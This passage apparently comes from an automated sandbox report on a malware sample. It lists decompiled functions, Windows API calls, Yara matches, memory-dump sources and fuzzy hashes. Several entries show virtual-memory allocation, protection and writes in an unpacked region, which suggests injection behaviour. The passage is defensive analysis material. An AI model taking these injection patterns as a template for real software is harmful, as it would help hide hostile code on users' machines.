                                                                                                                                                                          0x00405de7
                                                                                                                                                                          0x00405dea
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405def
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405df6
                                                                                                                                                                          0x00405dbf
                                                                                                                                                                          0x00405dbf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405dbf
                                                                                                                                                                          0x00405c99
                                                                                                                                                                          0x00405c9c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405c9c

                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,74E5FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                                                                                                          • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74E5FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                                                                                                          • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74E5FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                          • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                          • API String ID: 2035342205-2110562171
                                                                                                                                                                          • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                          • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                                                                                                          • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                          • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294663A, Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 787COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                          • String ID: !k=t$\n$l$%}
                                                                                                                                                                          • API String ID: 1029625771-2720906836
                                                                                                                                                                          • Opcode ID: 36fcd6c474955215d6ed56513828e646f212390bccc4af1d8dff06da2daee602
                                                                                                                                                                          • Instruction ID: 8d5024dd5321b59319d333c8838736fa8dece4df537b49a318315178593463a4
                                                                                                                                                                          • Opcode Fuzzy Hash: 36fcd6c474955215d6ed56513828e646f212390bccc4af1d8dff06da2daee602
                                                                                                                                                                          • Instruction Fuzzy Hash: B862FEB160434A9FDB749F28CD95BEA7BB2FF59340F85812EDD899B210D7344A81CB42
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294637F, Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 911COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: \n$l$%}
                                                                                                                                                                          • API String ID: 0-2111475558
                                                                                                                                                                          • Opcode ID: fdac191ea49ecbe6478a0316402483e21b02dfd4d257574fa9fe44552b6716ad
                                                                                                                                                                          • Instruction ID: 267e327e91ddb724df947ece29ed5de60d82201f4363efc0578af3dd1a4b282e
                                                                                                                                                                          • Opcode Fuzzy Hash: fdac191ea49ecbe6478a0316402483e21b02dfd4d257574fa9fe44552b6716ad
                                                                                                                                                                          • Instruction Fuzzy Hash: 7A820FB56043499FDF349F28CD94BEA77B6FF59340F85812ADD899B200D7349A82CB42
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 029402A2, Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 885COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                                                                          • String ID: \n$l$%}
                                                                                                                                                                          • API String ID: 2616484454-2111475558
                                                                                                                                                                          • Opcode ID: d426df5b96fa6be101cb9400348bb41f6bde977eb3f0c5bbcd397ad056f665fb
                                                                                                                                                                          • Instruction ID: 01f7eff3076cf8de8a6fb01824dc7a5dba53bc27a748da20a5bd9e69aaf5cb61
                                                                                                                                                                          • Opcode Fuzzy Hash: d426df5b96fa6be101cb9400348bb41f6bde977eb3f0c5bbcd397ad056f665fb
                                                                                                                                                                          • Instruction Fuzzy Hash: AF7201B160434A9FDF349F28CD94BEA77B2FF55350F85822ADD899B250D7348985CB02
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294607E, Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 845COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: \n$l$%}
                                                                                                                                                                          • API String ID: 0-2111475558
                                                                                                                                                                          • Opcode ID: a330e568f558a051e870357b5c19890c07aa47c4f1e0ed2d53c962e6104b2e2a
                                                                                                                                                                          • Instruction ID: fcd7a9857583d1b972cde5132a5e1ec4250758e6e1f5db2f39221c25f37648ed
                                                                                                                                                                          • Opcode Fuzzy Hash: a330e568f558a051e870357b5c19890c07aa47c4f1e0ed2d53c962e6104b2e2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 517200B560034A9FDB749F28CD98BEA77B2FF59340F85812EDD899B250D7344A81CB42
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294A152, Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 762COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                                                                          • String ID: Hyf$Hyf
                                                                                                                                                                          • API String ID: 3389902171-1457219065
                                                                                                                                                                          • Opcode ID: 4bdbf17ef62470fc0b29d65b0ebd1e5b71fbcb37624a2676a9c22056201b3a7c
                                                                                                                                                                          • Instruction ID: a9524cfb3a5ff383cb81a4c60d57e7b853502cef97ec99c2198d9010d650583b
                                                                                                                                                                          • Opcode Fuzzy Hash: 4bdbf17ef62470fc0b29d65b0ebd1e5b71fbcb37624a2676a9c22056201b3a7c
                                                                                                                                                                          • Instruction Fuzzy Hash: EE525A716043858FCF35DF38C9A8BDA7BE2AF56360F49825ACC998F296D7308546C712
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 029469EB, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 539COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: l$%}
                                                                                                                                                                          • API String ID: 0-2847384829
                                                                                                                                                                          • Opcode ID: cd708aade63b5b646dc0995154823217f093743de3277ce4261d6653cf53d819
                                                                                                                                                                          • Instruction ID: fcfa6e8e68399968f43eb6a5bfbb3e8637bdf5cec443f786537228d7554a3de4
                                                                                                                                                                          • Opcode Fuzzy Hash: cd708aade63b5b646dc0995154823217f093743de3277ce4261d6653cf53d819
                                                                                                                                                                          • Instruction Fuzzy Hash: 67220FB2A0434ADFDB749F28CD957DAB7B2FF58340F85812ADD899B210D7344A81CB42
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02946A7B, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 524COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: l$%}
                                                                                                                                                                          • API String ID: 0-2847384829
                                                                                                                                                                          • Opcode ID: 4c7e3a5243631d437eeb78c5cf2790adbc5bc422fce85b0bf4e0e05a6243b7a8
                                                                                                                                                                          • Instruction ID: d58077e842fec6ce4cffd74856a8ac7a7a688bd8259e5cf2fbf1ee4c3612ec3f
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c7e3a5243631d437eeb78c5cf2790adbc5bc422fce85b0bf4e0e05a6243b7a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 78220FB2A0434ADFDB749F28CD957EA77B2FF58340F898129DD899B210D7345A81CB42
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02947BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141memorynativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0294909F: LoadLibraryA.KERNELBASE(?,CE79F4FB,?,02947C4C), ref: 02949135
                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL ref: 02947D3D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                                                                          • String ID: =
                                                                                                                                                                          • API String ID: 2616484454-2322244508
                                                                                                                                                                          • Opcode ID: c882fc534a79a4634f72d2ab38298bc1f67aa52d8ff21840136b4515ec440717
                                                                                                                                                                          • Instruction ID: 8a363ce78b8acd36ad642c5f941f54122da5a351339eb2d02f61d3920754a65d
                                                                                                                                                                          • Opcode Fuzzy Hash: c882fc534a79a4634f72d2ab38298bc1f67aa52d8ff21840136b4515ec440717
                                                                                                                                                                          • Instruction Fuzzy Hash: 5951F2762453498FEB289E29DC917DE77A2EF86314F56442EDCC9DB220D731858ACB02
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294AF3F, Relevance: 3.4, APIs: 2, Instructions: 371COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ManagerOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1889721586-0
                                                                                                                                                                          • Opcode ID: c5a9eea3cac515bcb506b64e83cdcef7ba2037c814ac9a91b9baf9fc0d47f343
                                                                                                                                                                          • Instruction ID: f26b0d05d50496b10b1a851d0713dab82b240f021de8179de7fafb35234af9b6
                                                                                                                                                                          • Opcode Fuzzy Hash: c5a9eea3cac515bcb506b64e83cdcef7ba2037c814ac9a91b9baf9fc0d47f343
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD18A7160074A8FCF399F38C9A57EA7BA2FF56360F55412ECC899B610DB318986CB41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294AA46, Relevance: 3.1, APIs: 2, Instructions: 86librarynativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,CE79F4FB,?,02947C4C), ref: 02949135
                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(-CF2F08D8,?,?,?,?,0294A213,-348E01D3,02946747,20FAB0F7), ref: 0294AACF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3389902171-0
                                                                                                                                                                          • Opcode ID: 6825fe79bdb0594dd5d37fca4b18197d0590dfe87dc52f51032b8a5439f41e88
                                                                                                                                                                          • Instruction ID: 927ceaaa2b4366c07984bcaead696483ee23e06b924d969fd60a9ce9684cce6e
                                                                                                                                                                          • Opcode Fuzzy Hash: 6825fe79bdb0594dd5d37fca4b18197d0590dfe87dc52f51032b8a5439f41e88
                                                                                                                                                                          • Instruction Fuzzy Hash: 9231C1B16002859FDB34DE69CC58BDE77E6AFD9320F84812AAC9C9B344DB709A05CF45
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00406873, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}




                                                                                                                                                                          0x0040687e
                                                                                                                                                                          0x00406887
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406894
                                                                                                                                                                          0x0040688a
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNELBASE(74E5FAA0,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74E5FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74E5FAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                          • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                          • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                                                                                                          • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                          • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02946CE3, Relevance: 1.9, APIs: 1, Instructions: 387COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f703595187ab280121bf664912c5a4d9cf7c1807fe6b58613926ec4e85c4d9f0
                                                                                                                                                                          • Instruction ID: 93ae6d808c0b86c53d9b4224d366276cdab0b9cdd3383d969c58971164f69e02
                                                                                                                                                                          • Opcode Fuzzy Hash: f703595187ab280121bf664912c5a4d9cf7c1807fe6b58613926ec4e85c4d9f0
                                                                                                                                                                          • Instruction Fuzzy Hash: D6F1FEB2A04389DFDF749F64DC94BEA77A2FF58340F894129DE899B250D7344A81CB12
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294700B, Relevance: 1.8, APIs: 1, Instructions: 253COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 76d84c6ab46dd15984aae2d246d0358c8d69018a59c6346b896bef0004f7ba24
                                                                                                                                                                          • Instruction ID: f4eaa945116e6e6a36e8e37355496f6f67eeb0c100f3970b2e639f446c81c80a
                                                                                                                                                                          • Opcode Fuzzy Hash: 76d84c6ab46dd15984aae2d246d0358c8d69018a59c6346b896bef0004f7ba24
                                                                                                                                                                          • Instruction Fuzzy Hash: 2DA1EDB2A413899FCF359F64DC94BEA77A2FF58350F848129DD4D9B250CB345A81CB41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294708D, Relevance: 1.7, APIs: 1, Instructions: 200nativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,415A126F,?,00000000,?,?,?,?,-5E8F4EEF), ref: 0294731C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3527976591-0
                                                                                                                                                                          • Opcode ID: 0fa8e3dda5fb17980b58f3f543cdb0601010ad2b3b9f21e7c71c1dd73e3bf5d2
                                                                                                                                                                          • Instruction ID: 028ba7e7943d585d42c09a25018b2df21dc48bdb5533feca6ecdb79f2a7578ab
                                                                                                                                                                          • Opcode Fuzzy Hash: 0fa8e3dda5fb17980b58f3f543cdb0601010ad2b3b9f21e7c71c1dd73e3bf5d2
                                                                                                                                                                          • Instruction Fuzzy Hash: 5A81FEB1A413899FDF34AF28DD94BDA77A2FF58350F848129DD8D9B250CB305A81CB41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02947154, Relevance: 1.7, APIs: 1, Instructions: 179nativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,415A126F,?,00000000,?,?,?,?,-5E8F4EEF), ref: 0294731C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3527976591-0
                                                                                                                                                                          • Opcode ID: 002f5c870985c12d6141d8afe53f4dea4c2823e4e3397dd62f95c35a345e41f3
                                                                                                                                                                          • Instruction ID: c1fb1d42cdfc6dfe390af5e9ae9c9a83717443400912c1841d7f1784f122f7da
                                                                                                                                                                          • Opcode Fuzzy Hash: 002f5c870985c12d6141d8afe53f4dea4c2823e4e3397dd62f95c35a345e41f3
                                                                                                                                                                          • Instruction Fuzzy Hash: D471FFB5A413899FDF35AF28DC94BDA3BA2EF58350F848129DD4D9B250CB345A85CB40
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 029471F8, Relevance: 1.7, APIs: 1, Instructions: 169nativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,415A126F,?,00000000,?,?,?,?,-5E8F4EEF), ref: 0294731C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3527976591-0
                                                                                                                                                                          • Opcode ID: d4f38752d002632381017c2c9f7a327d562379cdc9d3ab6c5e124071ae107f3a
                                                                                                                                                                          • Instruction ID: e7ca151d0e0fb7ac0035ea9e1ea7738af3bc84f6d312a26dfc5fd08701a09d4e
                                                                                                                                                                          • Opcode Fuzzy Hash: d4f38752d002632381017c2c9f7a327d562379cdc9d3ab6c5e124071ae107f3a
                                                                                                                                                                          • Instruction Fuzzy Hash: F26121B16413899FCF349F38DC94BDA7BA2EF58350F988129ED4D9B210DB304A85CB40
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02947219, Relevance: 1.7, APIs: 1, Instructions: 162nativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,415A126F,?,00000000,?,?,?,?,-5E8F4EEF), ref: 0294731C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3527976591-0
                                                                                                                                                                          • Opcode ID: 98d07387438a01cded867b6cd369d540f97636a30634890721685d5580dbd347
                                                                                                                                                                          • Instruction ID: c2d5d35c7263ddf2d1a1a601f709a4eac17e0327f35b41fb717cbea42ca4192f
                                                                                                                                                                          • Opcode Fuzzy Hash: 98d07387438a01cded867b6cd369d540f97636a30634890721685d5580dbd347
                                                                                                                                                                          • Instruction Fuzzy Hash: 9461FEB16413899FCF31AF28DD94BDA7BA2EF58350F988129ED4C9B210DB345A81CB40
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294723B, Relevance: 1.6, APIs: 1, Instructions: 139nativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,415A126F,?,00000000,?,?,?,?,-5E8F4EEF), ref: 0294731C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3527976591-0
                                                                                                                                                                          • Opcode ID: b405c7bcfc9da8280a7faadd515d4472687dbe7366df3a0c09995575e66ed32f
                                                                                                                                                                          • Instruction ID: 3ac3da8061aea87ea6d5ed5a4a11f3f95164cd4eba1ac560b2760c7f948c3cba
                                                                                                                                                                          • Opcode Fuzzy Hash: b405c7bcfc9da8280a7faadd515d4472687dbe7366df3a0c09995575e66ed32f
                                                                                                                                                                          • Instruction Fuzzy Hash: E651EEB5A413899FDF35AF28DC947DA37A2FF58350F848129ED4C9B210DB359A45CB80
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 029479D2, Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNELBASE(?), ref: 02947AC8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: 6525bcaa68578367e05241d37f4c57ba093197902abe5876c5748ba734629449
                                                                                                                                                                          • Instruction ID: 8d6915afe7598e95a247a837529b0015590e8134de7ae4ebffce7a6dbc0202b3
                                                                                                                                                                          • Opcode Fuzzy Hash: 6525bcaa68578367e05241d37f4c57ba093197902abe5876c5748ba734629449
                                                                                                                                                                          • Instruction Fuzzy Hash: DF2184B5604304DBDB609E68E95A7EF77E2AF55200F82482EDCC19B504E73089C68F03
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 029479C2, Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNELBASE(?), ref: 02947AC8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: eac0b3eddec4cba56d0d402be84255be1eeff672d542bd665950b931a04056f5
                                                                                                                                                                          • Instruction ID: 26ad802fbe77a87254b22b12472c783903d78f0aa8a5d9f1f526561e357e6b2b
                                                                                                                                                                          • Opcode Fuzzy Hash: eac0b3eddec4cba56d0d402be84255be1eeff672d542bd665950b931a04056f5
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E21F3B0604344DFDB649E64D5597EF77E2BF55240F82481EDCC58B505E73049858B03
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

